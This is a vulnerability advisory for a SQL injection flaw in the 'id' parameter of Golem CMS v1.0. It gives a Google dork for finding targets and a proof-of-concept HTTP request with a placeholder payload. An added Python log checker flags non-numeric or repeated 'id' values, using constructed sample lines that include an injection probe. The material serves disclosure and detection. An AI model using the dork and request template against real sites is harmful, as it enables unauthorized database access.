Golem [CMS] v1.0 - SQL Injection

2018.04.17
Credit: TukangSihir
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title: Golem [CMS] v1.0 - SQL Injection
# Google Dork: inurl:cms-admin
# Date: 2018 April 17
# Exploit Author: TukangSihir
# Vendor Homepage: http://www.spaziogrezzo.it/
# Version: 1.0
# Tested on: Ubuntu

1. Description

The application does not validate or sanitize the "id" parameter, so an attacker can perform SQL injection and read the database.

#####POC#####

GET /it/eventi-dettaglio.php?id=[SQLi] HTTP/1.1
Host: [target]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: [target]
Cookie: displayCookieConsent=y; _ga=GA1.2.353727022.1523902983; _gid=GA1.2.999499184.1523902983; PHPSESSID=lps0dkpciu5pss5fubomah7116
Connection: close
Upgrade-Insecure-Requests: 1

#############
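Added example (not part of the original advisory or the vendor's code): a log check that flags requests to eventi-dettaglio.php whose "id" parameter is repeated or is not a plain integer after URL-decoding. It assumes "id" is a small positive integer and that the web server writes Apache/nginx "combined" access logs; the sample lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in "combined" log format (not real traffic).
SAMPLE_LOG = """\
203.0.113.5 - - [17/Apr/2018:10:01:02 +0200] "GET /it/eventi-dettaglio.php?id=42 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [17/Apr/2018:10:01:07 +0200] "GET /it/eventi-dettaglio.php?id=42%27 HTTP/1.1" 500 310 "-" "Mozilla/5.0"
203.0.113.9 - - [17/Apr/2018:10:01:09 +0200] "GET /it/eventi-dettaglio.php?id=42&id=7 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.3 - - [17/Apr/2018:10:02:00 +0200] "GET /it/contatti.php?id=abc HTTP/1.1" 200 900 "-" "Mozilla/5.0"
198.51.100.3 - - [17/Apr/2018:10:02:05 +0200] "GET /it/eventi-dettaglio.php HTTP/1.1" 200 800 "-" "Mozilla/5.0"
"""

REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*"')
TARGET_SCRIPT = "/eventi-dettaglio.php"  # script named in the advisory
ID_RE = re.compile(r"[0-9]{1,10}")       # assumption: id is a small positive integer


def check_id(query):
    """Return None if id is absent or a single plain integer, else a reason string."""
    values = parse_qs(query, keep_blank_values=True).get("id", [])
    if len(values) > 1:
        return "repeated id"
    if values and not ID_RE.fullmatch(values[0]):
        return "non-numeric id"
    return None


def scan(log_text):
    """Return (client, request_target, reason) for suspicious requests to the script."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target = m.groups()
        parts = urlsplit(target)
        if not parts.path.endswith(TARGET_SCRIPT):
            continue
        reason = check_id(parts.query)
        if reason:
            findings.append((client, target, reason))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(*finding, sep="  ")
```

The same allow-list (digits only, one value) is the input check the script itself should apply before the value reaches a parameterized query.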


Copyright 2018, cxsecurity.com

 
